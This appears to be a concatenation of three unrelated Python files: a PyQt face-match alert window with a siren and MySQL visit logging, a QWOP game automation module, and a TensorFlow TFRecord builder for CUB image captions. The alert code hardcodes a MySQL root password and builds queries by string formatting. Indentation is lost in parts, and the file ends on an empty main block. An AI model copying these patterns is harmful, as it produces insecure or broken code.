self.lineEdit_datetime.setText(self.curr_dt)
#self.lineEdit_date.setText(curdate())
#self.lineEdit_time.setText(curtime())
self.enrolled_img = 'Registered/' + f_name + '.jpg'
self.lastmatch_img = 'Monitor/Registered/'+f_name+'/' + f_name2
pixmap = QtGui.QPixmap('/home/anonymous/Desktop/Project-test/Registered/' + f_name + '.jpg')
pixmap = pixmap.scaled(self.label_img1.width(), self.label_img1.height(), QtCore.Qt.KeepAspectRatio)
self.label_img1.setPixmap(pixmap)
self.label_img1.setAlignment(QtCore.Qt.AlignCenter)
pixmap = QtGui.QPixmap('/home/anonymous/Desktop/Project-test/Monitor/Registered/'+f_name+'/' + f_name2)
pixmap = pixmap.scaled(self.label_img2.width(), self.label_img2.height(), QtCore.Qt.KeepAspectRatio)
self.label_img2.setPixmap(pixmap)
self.label_img2.setAlignment(QtCore.Qt.AlignCenter)
P1 = multiprocessing.Process(target=self.view)
P1.start()
def view(self):
ID = int(self.lineEdit_id.text())
connnection = pymysql.connect("localhost", "root", "rootpass", "project")
cursor = connnection.cursor()
select_query = ("select count(*) from view where id =%d") % (ID)
cursor.execute(select_query)
r = cursor.fetchone()
v = int(r[0]) + 1
insert_query = "insert into view(id,curr_time,curr_date,visit) values(%d,curtime(),curdate(),%d)" % (ID, v)
cursor.execute(insert_query)
connnection.commit()
connnection.close()
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(681, 343)
MainWindow.setStyleSheet("*{\n"
" color:rgb(186, 189, 182);\n"
" background:rgb(46, 52, 54);\n"
" font: 12pt \"URW Gothic L\";\n"
"}\n"
"QLineEdit{\n"
" color:rgb(238, 238, 236);\n"
" border:1px solid rgb(186, 189, 182);\n"
" \n"
"}")
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.label_img1 = QtWidgets.QLabel(self.centralwidget)
self.label_img1.setGeometry(QtCore.QRect(20, 80, 151, 161))
self.label_img1.setStyleSheet("QLabel{\n"
" border:1px solid rgb(211, 215, 207);\n"
"}")
self.label_img1.setText("")
self.label_img1.setObjectName("label_img1")
self.label_img2 = QtWidgets.QLabel(self.centralwidget)
self.label_img2.setGeometry(QtCore.QRect(190, 80, 151, 161))
self.label_img2.setStyleSheet("QLabel{\n"
" border:1px solid rgb(211, 215, 207);\n"
"}")
self.label_img2.setText("")
self.label_img2.setObjectName("label_img2")
self.btn_stopsiren = QtWidgets.QPushButton(self.centralwidget)
self.btn_stopsiren.setGeometry(QtCore.QRect(110, 290, 171, 41))
self.btn_stopsiren.setStyleSheet("QPushButton{\n"
" border:1px solid red; \n"
" background:rgb(239, 41, 41);\n"
" border-radius:15px;\n"
" color:white;\n"
"}\n"
"QPushButton:hover{\n"
" border:1px solid white;\n"
"}")
self.btn_stopsiren.setObjectName("btn_stopsiren")
self.btn_sndmail = QtWidgets.QPushButton(self.centralwidget)
self.btn_sndmail.setGeometry(QtCore.QRect(360, 290, 181, 41))
self.btn_sndmail.setStyleSheet("QPushButton{\n"
" border:1px solid rgb(52, 101, 164); \n"
" background:rgb(52, 101, 164);\n"
" border-radius:15px;\n"
" color:white;\n"
"}\n"
"QPushButton:hover{\n"
" border: 1px solid white;\n"
"}")
self.btn_sndmail.setObjectName("btn_sndmail")
self.lineEdit_id = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_id.setGeometry(QtCore.QRect(390, 60, 41, 21))
self.lineEdit_id.setObjectName("lineEdit_id")
self.lineEdit_name = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_name.setGeometry(QtCore.QRect(520, 60, 141, 21))
self.lineEdit_name.setObjectName("lineEdit_name")
self.lineEdit_age = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_age.setGeometry(QtCore.QRect(410, 100, 51, 21))
self.lineEdit_age.setObjectName("lineEdit_age")
self.lineEdit_gender = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_gender.setGeometry(QtCore.QRect(552, 100, 111, 21))
self.lineEdit_gender.setObjectName("lineEdit_gender")
self.lineEdit_nationality = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_nationality.setGeometry(QtCore.QRect(460, 140, 201, 21))
self.lineEdit_nationality.setObjectName("lineEdit_nationality")
self.lineEdit_other = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_other.setGeometry(QtCore.QRect(450, 180, 211, 21))
self.lineEdit_other.setObjectName("lineEdit_other")
self.label_3 = QtWidgets.QLabel(self.centralwidget)
self.label_3.setGeometry(QtCore.QRect(360, 60, 21, 17))
self.label_3.setObjectName("label_3")
self.label_4 = QtWidgets.QLabel(self.centralwidget)
self.label_4.setGeometry(QtCore.QRect(460, 60, 51, 17))
self.label_4.setObjectName("label_4")
self.label_5 = QtWidgets.QLabel(self.centralwidget)
self.label_5.setGeometry(QtCore.QRect(360, 100, 41, 21))
self.label_5.setObjectName("label_5")
self.label_6 = QtWidgets.QLabel(self.centralwidget)
self.label_6.setGeometry(QtCore.QRect(480, 100, 67, 17))
self.label_6.setObjectName("label_6")
self.label_7 = QtWidgets.QLabel(self.centralwidget)
self.label_7.setGeometry(QtCore.QRect(360, 140, 91, 21))
self.label_7.setObjectName("label_7")
self.label_8 = QtWidgets.QLabel(self.centralwidget)
self.label_8.setGeometry(QtCore.QRect(360, 180, 81, 17))
self.label_8.setObjectName("label_8")
self.label_9 = QtWidgets.QLabel(self.centralwidget)
self.label_9.setGeometry(QtCore.QRect(360, 220, 91, 17))
self.label_9.setObjectName("label_9")
self.label_11 = QtWidgets.QLabel(self.centralwidget)
self.label_11.setGeometry(QtCore.QRect(130, 40, 121, 31))
self.label_11.setStyleSheet("QLabel{\n"
" color:rgb(115, 210, 22);\n"
" border:1px solid red;\n"
"}")
self.label_11.setObjectName("label_11")
self.label_12 = QtWidgets.QLabel(self.centralwidget)
self.label_12.setGeometry(QtCore.QRect(280, 0, 121, 41))
self.label_12.setStyleSheet("QLabel{\n"
" color:white; \n"
" font: 63 23pt \"URW Gothic L\";\n"
"}")
self.label_12.setObjectName("label_12")
self.lineEdit_datetime = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_datetime.setGeometry(QtCore.QRect(450, 220, 211, 21))
self.lineEdit_datetime.setObjectName("lineEdit_datetime")
self.label_13 = QtWidgets.QLabel(self.centralwidget)
self.label_13.setGeometry(QtCore.QRect(40, 250, 111, 21))
self.label_13.setStyleSheet("QLabel{\n"
" color:white;\n"
"}")
self.label_13.setObjectName("label_13")
self.label_14 = QtWidgets.QLabel(self.centralwidget)
self.label_14.setGeometry(QtCore.QRect(220, 250, 91, 21))
self.label_14.setStyleSheet("QLabel{\n"
" color:white;\n"
"}")
self.label_14.setObjectName("label_14")
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
pygame.mixer.init()
pygame.mixer.music.load('Sound/siren.wav')
pygame.mixer.music.play(0)
self.P2 = multiprocessing.Process(target=self.send_mail)
self.btn_sndmail.clicked.connect(self.P2.start)
self.btn_stopsiren.clicked.connect(self.stop_)
    def retranslateUi(self, MainWindow):
        """Apply user-visible text to all widgets.

        Standard pyuic-generated i18n hook: called once from setupUi and again
        whenever the application language changes.
        """
        _translate = QtCore.QCoreApplication.translate
        MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
        self.btn_stopsiren.setText(_translate("MainWindow", "Stop Siren/Mail"))
        self.btn_sndmail.setText(_translate("MainWindow", "Send Mail"))
        # Captions for the matched person's detail fields.
        self.label_3.setText(_translate("MainWindow", "ID"))
        self.label_4.setText(_translate("MainWindow", "Name "))
        self.label_5.setText(_translate("MainWindow", "Age"))
        self.label_6.setText(_translate("MainWindow", "Gender"))
        self.label_7.setText(_translate("MainWindow", "Nationality"))
        self.label_8.setText(_translate("MainWindow", "Other Info"))
        self.label_9.setText(_translate("MainWindow", "Date/Time"))
        # Alert banner texts.
        self.label_11.setText(_translate("MainWindow", "Match Found"))
        self.label_12.setText(_translate("MainWindow", "ALERT!!!"))
        self.label_13.setText(_translate("MainWindow", "Enrolled Photo"))
        self.label_14.setText(_translate("MainWindow", "Last Match"))
import img
if __name__ == "__main__":
    import sys

    # Bootstrap the Qt application, build the alert window, and enter the
    # event loop; the process exit code is whatever exec_() returns.
    app = QtWidgets.QApplication(sys.argv)
    main_window = QtWidgets.QMainWindow()
    ui = Ui_Alert()
    ui.setupUi(main_window)
    main_window.show()
    sys.exit(app.exec_())
qwop.py | """ Functions for creating and positioning a webview with the QWOP game """
import os
import platform
import pyautogui
import threading
import time
from datetime import timedelta
from selenium import webdriver
from totter.api.image_processing import ImageProcessor
from totter.utils.time import WallTimer
# determine size of screen
screen_width, screen_height = pyautogui.size()
# correct for double-monitor setup
# NOTE(review): assumes two equal-width monitors side by side whenever the
# total width exceeds 1920px -- confirm for other multi-monitor layouts.
if screen_width > 1920:
    screen_width = screen_width // 2
# qwop-related constants
_QWOP_URL = "http://foddy.net/Athletics.html?webgl=true"  # Note that it should be the HTML5 version
_QWOP_WIDTH = 700
_QWOP_HEIGHT = 500
# centre of the (single) screen, where the game canvas will be placed
QWOP_CENTER = (screen_width // 2, screen_height // 2)
# (left, top, width, height) region used when screenshotting the game
QWOP_BOUNDING_BOX = (
    QWOP_CENTER[0] - _QWOP_WIDTH // 2,  # left
    QWOP_CENTER[1] - _QWOP_HEIGHT // 2,  # top
    _QWOP_WIDTH,  # width
    _QWOP_HEIGHT  # height
)
# create a selenium driver to open web pages
current_dir = os.path.dirname(os.path.abspath(__file__))
driver_dir = os.path.join(current_dir, 'drivers')
# find the appropriate geckodriver for the current platform
if platform.system() == 'Linux':
    geckopath = os.path.join(driver_dir, 'nix', 'geckodriver')
elif platform.system() == 'Darwin':
    geckopath = os.path.join(driver_dir, 'osx', 'geckodriver')
else:
    # anything else is assumed to be Windows
    geckopath = os.path.join(driver_dir, 'win', 'geckodriver.exe')
geckopath = os.path.abspath(geckopath)
# module-level handle to the singleton browser window (None until opened)
_browser = None
def _open_qwop_window():
    """ Opens a browser tab with the HTML5 version of QWOP """
    global _browser
    _browser = webdriver.Firefox(executable_path=geckopath)
    # move the browser window to a fixed and predictable location
    # (the +100 / -50 offsets presumably leave room for the browser chrome so
    # the canvas lands on QWOP_BOUNDING_BOX -- TODO confirm per platform)
    _browser.set_window_size(width=QWOP_BOUNDING_BOX[2]+100, height=QWOP_BOUNDING_BOX[3]+100)
    _browser.set_window_position(x=QWOP_BOUNDING_BOX[0]-50, y=QWOP_BOUNDING_BOX[1]-50)
    _browser.get(_QWOP_URL)
def _close_qwop_window():
    """Kill the open webview and forget the handle.

    Resetting ``_browser`` to ``None`` makes closing idempotent: a second
    call to ``stop_qwop`` (which guards on ``_browser is not None``) will no
    longer try to ``quit()`` an already-terminated driver.
    """
    global _browser
    if _browser is not None:
        _browser.quit()
        _browser = None
def _end_game_manually():
    """Force the run to end with deliberately bad input.

    Taps 'w' briefly, then holds 'q' and 'p' together for three seconds --
    a combination that almost always makes the runner fall over.
    """
    pyautogui.keyDown('w')
    time.sleep(1)
    pyautogui.keyUp('w')
    for key in ('q', 'p'):
        pyautogui.keyDown(key)
    time.sleep(3)
    for key in ('q', 'p'):
        pyautogui.keyUp(key)
def start_qwop():
    """ Create a QWOP instance and wait for it to load """
    _open_qwop_window()
    # fixed grace period for page load -- the game exposes no readiness signal
    time.sleep(5)
def stop_qwop():
    """ Stop the QWOP instance if one is open """
    # `global` is declared for clarity; only a read of _browser happens here.
    global _browser
    if _browser is not None:
        _close_qwop_window()
class QwopSimulator(object):
    """Runs a QwopStrategy inside a live QWOP window and measures the result."""

    def __init__(self, time_limit, buffer_size=16):
        """ Initialize a QwopSimulator
        QwopSimulator provides a method for running a QwopStrategy object in an instance of the QWOP game
        Args:
            time_limit (float): time limit in seconds for the simulation
            buffer_size (int):
                number of checks to perform in the same-history ending condition.
                If the distance run is the same for `buffer_size` checks in a row, then the simulation is terminated.
                Checks are performed 3-4 times per second depending on processor speed.
        """
        self.time_limit = time_limit                                  # seconds allowed per run
        self.timer = WallTimer()                                      # wall-clock timer for the run
        self.image_processor = ImageProcessor(buffer_size=buffer_size)  # screenshot-based game-state reader

    def _loop_gameover_check(self, interval=0.25):
        """ Checks if the game has ended every `interval` seconds.
        Terminates when the game ends or after the simulator's time limit is reached.
        Runs on a background thread started by simulate(); it feeds screenshots
        to the image processor, whose is_game_over() flag the main loop polls.
        Args:
            interval (float): time in seconds between game over checks
        Returns: None
        """
        while self.timer.since() < timedelta(seconds=self.time_limit):
            screen = pyautogui.screenshot(region=QWOP_BOUNDING_BOX)
            self.image_processor.update(screen)
            if self.image_processor.is_game_over():
                break
            time.sleep(interval)

    def is_game_over(self):
        # Delegates to the image processor's latest screenshot-derived state.
        return self.image_processor.is_game_over()

    def simulate(self, strategy, qwop_started=False):
        """ Run the given QwopStrategy
        Args:
            strategy (QwopStrategy): the strategy to execute
            qwop_started (bool): if set, the simulator will assume that a QWOP window has already been opened
        Returns:
            (float, float): distance run, time taken
        """
        if not qwop_started:
            start_qwop()
        # click the qwop window to give it keyboard focus
        pyautogui.moveTo(QWOP_CENTER[0], QWOP_CENTER[1], duration=0.1)
        pyautogui.click()
        # press spacebar to restart the simulator if necessary
        pyautogui.press('space')
        # prep for a new run
        self.timer.restart()
        self.image_processor.reset()
        # start a thread to check if the game is over:
        game_over_checker = threading.Thread(target=self._loop_gameover_check, args=(0.25,))
        game_over_checker.start()
        # loop the strategy until the game ends or we hit the time limit
        # (the game-over flag is updated concurrently by the checker thread)
        while self.timer.since() < timedelta(seconds=self.time_limit) and not self.image_processor.is_game_over():
            strategy.execute()
        strategy.cleanup()
        # wait for the game over thread to finish its thing
        game_over_checker.join()
        distance_run = self.image_processor.get_final_distance()
        # .seconds truncates to whole seconds of the elapsed timedelta
        run_time = self.timer.since().seconds
        # if the simulator started its own QWOP window, then it should be destroyed
        if not qwop_started:
            stop_qwop()
        return distance_run, run_time
class QwopEvaluator(object):
    """Evaluates QwopStrategy objects, reporting (distance, time) per strategy."""

    def __init__(self, time_limit):
        """ Initialize a QwopEvaluator
        QwopEvaluator objects run QwopStrategy objects and report the distance run and time taken.
        Args:
            time_limit (float): time limit in seconds for each evaluation
        """
        self.evaluations = 0
        self.simulator = QwopSimulator(time_limit=time_limit)
        # open one shared QWOP instance, reused for every evaluation
        start_qwop()

    def evaluate(self, strategies):
        """ Evaluates a QwopStrategy or a set of QwopStrategy objects
        Args:
            strategies (QwopStrategy or Iterable<QwopStrategy>): set of strategies to evaluate
        Returns:
            ((distance1, time1), (distance2, time2), ...): distance,time pairs achieved by each QwopStrategy
        """
        # EAFP: a lone QwopStrategy has no len(); wrap it in a list
        try:
            len(strategies)
        except TypeError:
            strategies = [strategies]
        results = []
        for candidate in strategies:
            distance, elapsed = self.simulator.simulate(candidate, qwop_started=True)
            results.append((distance, elapsed))
            # if the strategy didn't end the game, end it manually
            if not self.simulator.is_game_over():
                _end_game_manually()
        return tuple(results)
class QwopStrategy:
    """A QWOP-playing strategy: a timed sequence of keystrokes.

    The supplied callable becomes the instance's ``execute`` method; during
    evaluation it is looped automatically until the game ends.
    """

    def __init__(self, execution_function):
        """Bind *execution_function* as this instance's execute() behavior.

        Args:
            execution_function (function): function that implements the strategy
        """
        self.execute = execution_function

    def cleanup(self):
        """Release every QWOP-relevant key after a run.

        Called once the game has ended or the evaluation time limit was hit,
        so no key is left held down for the next run.

        Returns: None
        """
        for released in ('q', 'w', 'o', 'p', 'space'):
            pyautogui.keyUp(released)
|
build_cub_data.py | # -*- coding: utf-8 -*-
# @File : google_im2txt/build_cub_data.py
# @Info : @ TSMC-SIGGRAPH, 2018/7/7
# @Desc :
# -.-.. - ... -- -.-. .-.. .- -... .---. -.-- ..- .-.. --- -. --. ..-. .- -.
import os
import random
import sys
import threading
from collections import namedtuple, Counter
from datetime import datetime
import numpy as np
import tensorflow as tf
from nltk.tokenize import word_tokenize
# --- Input/output locations -------------------------------------------------
tf.flags.DEFINE_string("train_image_dir", "/dataset/cub_merge_data/train",
                       "Training image directory.")
tf.flags.DEFINE_string("val_image_dir", "/dataset/cub_merge_data/val",
                       "Validating image directory.")
tf.flags.DEFINE_string("test_image_dir", "/dataset/cub_merge_data/test",
                       "Testing image directory.")
tf.flags.DEFINE_string("train_captions_file", "/dataset/cub_merge_data/cub_train_captions",
                       "Training captions text file.")
tf.flags.DEFINE_string("val_captions_file", "/dataset/cub_merge_data/cub_val_captions",
                       "Validating captions text file.")
tf.flags.DEFINE_string("test_captions_file", "/dataset/cub_merge_data/cub_test_captions",
                       "Testing captions text file.")
tf.flags.DEFINE_string("output_dir", "/dataset/cub200_tfrecord", "Output data directory.")
# --- Sharding (must be commensurate with num_threads; see main()) -----------
tf.flags.DEFINE_integer("train_shards", 128,
                        "Number of shards in training TFRecord files.")
tf.flags.DEFINE_integer("val_shards", 4,
                        "Number of shards in validation TFRecord files.")
tf.flags.DEFINE_integer("test_shards", 8,
                        "Number of shards in testing TFRecord files.")
# --- Vocabulary construction ------------------------------------------------
tf.flags.DEFINE_string("start_word", "<S>",
                       "Special word added to the beginning of each sentence.")
tf.flags.DEFINE_string("end_word", "</S>",
                       "Special word added to the end of each sentence.")
tf.flags.DEFINE_string("unknown_word", "<UNK>",
                       "Special word meaning 'unknown'.")
tf.flags.DEFINE_integer("min_word_count", 4,
                        "The minimum number of occurrences of each word in the "
                        "training set for inclusion in the vocabulary.")
tf.flags.DEFINE_string("word_counts_output_file", "/dataset/cub200_tfrecord/word_counts.txt",
                       "Output vocabulary file of word counts.")
tf.flags.DEFINE_integer("num_threads", 8,
                        "Number of threads to preprocess the images.")
FLAGS = tf.flags.FLAGS
# One image plus its list of (tokenized) captions.
ImageMetadata = namedtuple("ImageMetadata",
                           ["filename", "captions"])
def _process_caption(caption):
    """Processes a caption string into a list of tokenized words.

    Lowercases the caption, tokenizes it with NLTK, and brackets the result
    with the special start/end sentence markers from FLAGS.

    Args:
        caption: A string caption.
    Returns:
        A list of strings; the tokenized caption.
    """
    words = word_tokenize(caption.lower())
    return [FLAGS.start_word] + words + [FLAGS.end_word]
class Vocabulary(object):
    """Maps word strings to integer ids, with a fallback id for unknown words."""

    def __init__(self, vocab, unk_id):
        """Initializes the vocabulary.

        :arg vocab: a dictionary of word to word_id.
             unk_id: id of the special 'unknown' word.
        """
        self._vocab = vocab
        self._unk_id = unk_id

    def word_to_id(self, word):
        """:returns the integer id of a word string"""
        # dict.get with a default replaces the explicit membership test
        return self._vocab.get(word, self._unk_id)
class ImageDecoder(object):
    """helper class for decoding images in tensorflow"""

    def __init__(self):
        """create a single tensorflow session for all image decoding calls"""
        self._sess = tf.Session()
        # tensorflow ops for JPEG decoding (built once, fed per call)
        self._encoded_jpeg = tf.placeholder(dtype=tf.string)
        self._decode_jpeg = tf.image.decode_jpeg(self._encoded_jpeg, channels=3)

    def decode_jpeg(self, encoded_jpeg):
        """Decode raw JPEG bytes; sanity-check the result is 3-channel RGB."""
        image = self._sess.run(self._decode_jpeg, feed_dict={self._encoded_jpeg: encoded_jpeg})
        assert len(image.shape) == 3
        assert image.shape[2] == 3
        return image
def _int64_feature(value):
    """Wrapper for inserting an int64 Feature into a SequenceExample proto."""
    # a single scalar becomes a one-element Int64List
    return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _bytes_feature(value):
    """Wrapper for inserting a bytes Feature into a SequenceExample proto.

    ``value`` must already be ``bytes`` under Python 3; callers encode str
    values beforehand (see the ``.encode()`` in _to_sequence_example).
    """
    # (removed dead commented-out py2/py3 workaround variants)
    return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _int64_feature_list(values):
    """Wrapper for inserting an int64 FeatureList into a SequenceExample proto."""
    return tf.train.FeatureList(feature=[_int64_feature(v) for v in values])
def _bytes_feature_list(values):
    """Wrapper for inserting a bytes FeatureList into a SequenceExample proto."""
    return tf.train.FeatureList(feature=[_bytes_feature(v) for v in values])
def _to_sequence_example(image, decoder, vocab):
    """builds a SequenceExample proto for an image-caption pair.

    :arg image: an ImageMetadata object (must carry exactly one caption here).
         decoder: an ImageDecoder object (currently unused; see note below).
         vocab: a Vocabulary object.
    :returns a SequenceExample proto containing the raw image bytes and the
        caption encoded as integer word ids.
    """
    with tf.gfile.FastGFile(image.filename, "rb") as f:
        encoded_image = f.read()
    # # in order to open the image, and I removed the try, except image decoder check that follows reading the image.
    # # see: [https://github.com/tensorflow/models/issues/827], just for supporting python3
    # try:
    #     encoded_image = decoder.decode_jpeg(encoded_image)
    # except (tf.errors.InvalidArgumentError, AssertionError):
    #     print("skipping file with invalid JPEG dataset: %s" % image.filename)
    #     return
    context = tf.train.Features(feature={
        "image/data": _bytes_feature(encoded_image),
        # basename is encoded to bytes for python3 protobuf compatibility
        "image/filename": _bytes_feature(os.path.basename(image.filename).encode())
    })
    # although there are 10 captions for each image in oxford-102flower dataset, we have assign image for each caption
    # (upstream _process_dataset splits metadata so each entry has one caption)
    assert len(image.captions) == 1
    caption = image.captions[0]
    caption_ids = [vocab.word_to_id(word) for word in caption]
    feature_lists = tf.train.FeatureLists(feature_list={
        "image/caption_ids": _int64_feature_list(caption_ids)
    })
    sequence_example = tf.train.SequenceExample(context=context, feature_lists=feature_lists)
    return sequence_example
def _create_vocab(captions):
    """creates the vocabulary of word to word_id.

    The vocabulary is saved to disk in a text file of word counts. The id of each word
    in the file is its corresponding 0-based line number.
    >  counter=Counter()
    >  for c in [['this','is','a','young','girl'],['tonight','we','are','young']]:
    ...    counter.update(c)
    >  counter
    Counter({'young': 2, 'this': 1, 'is': 1, 'a': 1, 'girl': 1, 'tonight': 1, 'we': 1, 'are': 1})
    :arg captions: a list of lists of strings.
    :returns a Vocabulary object.
    """
    print("Creating vocabulary...")
    counter = Counter()
    for c in captions:
        counter.update(c)
    print("Total words:", len(counter))
    # filter uncommon words and sort by descending count.
    word_counts = [x for x in counter.items() if x[1] >= FLAGS.min_word_count]
    word_counts.sort(key=lambda x: x[1], reverse=True)
    print("words in vocabulary: ", len(word_counts))
    # write out the word counts file.
    with tf.gfile.FastGFile(FLAGS.word_counts_output_file, "w") as f:
        f.write("\n".join(["%s %d" % (w, c) for w, c in word_counts]))
    print("wrote vocabulary file:", FLAGS.word_counts_output_file)
    # create the vocabulary dictionary.
    # note: Be careful with 0's in vocabulary,
    # padding tensors with 0's may not be able to tell the difference between 0-padding
    reverse_vocab = [x[0] for x in word_counts]
    # unknown words map to the first id past the known vocabulary
    unk_id = len(reverse_vocab)
    # enumerate a range of numbers starting at 0: word -> its line number
    vocab_dict = dict([(x, y) for (y, x) in enumerate(reverse_vocab, start=0)])
    vocab = Vocabulary(vocab_dict, unk_id)
    return vocab
def _select_shorter_captions(captions, top_n):
"""
:param captions: a list of lists of string, such as [['a','b'],['c','d','e']]
:param top_n: an integer
:return: a list with top_n shortest length of the lists of string,
"""
assert top_n <= 10
lengths = [[x, len(y)] for x, y in enumerate(captions)]
# note: python3 works well, python2 unknown
lengths.sort(key=lambda elem: elem[1])
hit_elem = lengths[:top_n]
top_n_sentences = [captions[id_len[0]] for id_len in hit_elem]
return top_n_sentences
def _load_and_process_metadata(captions_file, image_dir):
    """loads image metadata from disk and processes the captions.

    return one elem of a list of ImageMetadata like follows:
    > [ImageMetadata(filename='/dataset/102flowers/jpg_resized/image_01074.jpg',
       captions=[['<S>', 'this', 'flower', 'has', 'nice', 'yellow', 'petals', 'with', 'white', 'ovule', '.', '</S>'],
       ...
       ['<S>', 'this', 'is', 'a', 'flower', 'with', 'yellow', 'petals', 'and', 'a', 'white', 'stigma', '.', '</S>']])]
    :arg captions_file: text file containing image filename and caption annotations pairs.
         image_xxxxx.jpg#caption in each line
         image_dir: directory containing the image files.
    :returns a list of ImageMetadata."""
    with tf.gfile.FastGFile(captions_file, "r") as f:
        captions_data = f.readlines()
    # extract the filenames. hint: image_xxxxx.jpg#caption in each line
    # extract the captions, each image is associated with multiple captions.
    img_to_captions = dict()
    for line in captions_data:
        # split on the first '#' separating filename from annotation text
        _img_filename, _annotation = line.strip().split("#")
        img_to_captions.setdefault(_img_filename, [])
        img_to_captions[_img_filename].append(_annotation)
    img_filenames = set(img_to_captions.keys())
    assert len(img_to_captions) == len(img_filenames)
    # Process the captions and combine the dataset into a list of ImageMetadata.
    print("processing captions.")
    image_metadata = []
    num_captions = 0
    for base_filename in img_filenames:
        filename = os.path.join(image_dir, base_filename)
        captions = [_process_caption(c) for c in img_to_captions[base_filename]]
        # # hint: Select the five shortest sentences
        # captions = _select_shorter_captions(captions, 5)
        image_metadata.append(ImageMetadata(filename, captions))
        num_captions += len(captions)
    print("finished processing %d captions for %d images in %s" % (num_captions, len(img_filenames), captions_file))
    return image_metadata
def _process_image_files(thread_index, ranges, name, images, decoder, vocab, num_shards):
    """processes and saves a subset of images as TFRecord files in one thread.

    :arg thread_index: Integer thread identifier within [0, len(ranges)].
         ranges: a list of pairs of integers specifying the ranges of the dataset to process in parallel.
         name: unique identifier specifying the dataset.
         images: list of ImageMetadata.
         decoder: an ImageDecoder object.
         vocab: a Vocabulary object.
         num_shards: Integer number of shards for the output files."""
    # each thread produces N shards where N = num_shards/num_threads, for instance, if
    # num_shards =128, and num_threads =2, then the first thread would produce shards [0, 64)
    num_threads = len(ranges)
    assert not num_shards % num_threads
    num_shards_per_batch = int(num_shards // num_threads)
    # evenly spaced cut points inside this thread's [start, end) slice
    shard_ranges = np.linspace(ranges[thread_index][0], ranges[thread_index][1], num_shards_per_batch + 1).astype(int)
    num_images_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
    counter = 0
    for s in range(num_shards_per_batch):
        # generate a sharded version of the file name, e.g. `train-00002-of-00010`
        shard = thread_index * num_shards_per_batch + s
        output_filename = "%s-%.5d-of-%.5d" % (name, shard, num_shards)
        output_file = os.path.join(FLAGS.output_dir, output_filename)
        writer = tf.python_io.TFRecordWriter(output_file)
        shard_counter = 0
        images_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
        for i in images_in_shard:
            image = images[i]
            sequence_example = _to_sequence_example(image, decoder, vocab)
            if sequence_example is not None:
                writer.write(sequence_example.SerializeToString())
                shard_counter += 1
                counter += 1
            # periodic progress report (every 1000 items)
            if not counter % 1000:
                print("%s [thread %d]: Processed %d of %d items in thread batch." %
                      (datetime.now(), thread_index, counter, num_images_in_thread))
                sys.stdout.flush()
        writer.close()
        print("%s [thread %d]: Wrote %d image-caption pairs to %s" %
              (datetime.now(), thread_index, shard_counter, output_file))
        sys.stdout.flush()
        shard_counter = 0
    print("%s [thread %d]: Wrote %d image-caption pairs to %d shards." %
          (datetime.now(), thread_index, counter, num_shards_per_batch))
    sys.stdout.flush()
# todo
def _process_dataset(name, images, vocab, num_shards):
    """processes a complete dataset set and saves it as a TFRecord.

    :arg name: unique identifier specifying the dataset
         images: list of ImageMetadata.
         vocab: a Vocabulary object.
         num_shards: Integer number of shards for the output files."""
    # hint: break up each image into a separate entity for each caption.
    images = [ImageMetadata(image.filename, [caption]) for image in images for caption in image.captions]
    # now length of images.captions is one
    # shuffle the ordering of images. make the randomization repeatable.
    random.seed(12345)
    random.shuffle(images)
    # break the images into num_threads batches. batch i is defined as images[ranges[i][0]:ranges[i][1]].
    num_threads = min(num_shards, FLAGS.num_threads)
    # fix: the `np.int` alias was removed in NumPy 1.24; the builtin `int`
    # is the documented, equivalent replacement for astype().
    spacing = np.linspace(0, len(images), num_threads + 1).astype(int)
    ranges = list()
    threads = list()
    for i in range(len(spacing) - 1):
        ranges.append([spacing[i], spacing[i + 1]])
    # Create a mechanism for monitoring when all threads are finished.
    coord = tf.train.Coordinator()
    # Create a utility for decoding JPEG images to run sanity checks.
    decoder = ImageDecoder()
    # Launch a thread for each batch.
    print("Launching %d threads for spacings: %s" % (num_threads, ranges))
    for thread_index in range(len(ranges)):
        args = (thread_index, ranges, name, images, decoder, vocab, num_shards)
        t = threading.Thread(target=_process_image_files, args=args)
        t.start()
        threads.append(t)
    # Wait for all the threads to terminate.
    coord.join(threads)
    print("%s: Finished processing all %d image-caption pairs in dataset set '%s'." %
          (datetime.now(), len(images), name))
def main(_):
    """Entry point: validate shard/thread flags, load caption metadata, build
    the vocabulary from the training captions, and write TFRecord shards."""
    def _is_valid_num_shards(num_shards):
        """Returns True if num_shards is compatible with FLAGS.num_threads."""
        return num_shards < FLAGS.num_threads or not num_shards % FLAGS.num_threads
    assert _is_valid_num_shards(FLAGS.train_shards), (
        "Please make the FLAGS.num_threads commensurate with FLAGS.train_shards")
    assert _is_valid_num_shards(FLAGS.val_shards), (
        "Please make the FLAGS.num_threads commensurate with FLAGS.val_shards")
    assert _is_valid_num_shards(FLAGS.test_shards), (
        "Please make the FLAGS.num_threads commensurate with FLAGS.test_shards")
    if not tf.gfile.IsDirectory(FLAGS.output_dir):
        tf.gfile.MakeDirs(FLAGS.output_dir)
    # Load image metadata from caption files.
    cub_train_dataset = _load_and_process_metadata(FLAGS.train_captions_file, FLAGS.train_image_dir)
    cub_val_dataset = _load_and_process_metadata(FLAGS.val_captions_file, FLAGS.val_image_dir)
    cub_test_dataset = _load_and_process_metadata(FLAGS.test_captions_file, FLAGS.test_image_dir)
    # NOTE(review): a comment here previously claimed an 85/5/10 redistribution,
    # but no redistribution happens -- the three pre-split inputs are used as-is.
    # Create vocabulary from the training captions only.
    train_captions = [c for image in cub_train_dataset for c in image.captions]
    vocab = _create_vocab(train_captions)
    _process_dataset("train", cub_train_dataset, vocab, FLAGS.train_shards)
    _process_dataset("val", cub_val_dataset, vocab, FLAGS.val_shards)
    _process_dataset("test", cub_test_dataset, vocab, FLAGS.test_shards)
#################
#   test call   #
#################
if __name__ == "__main__":
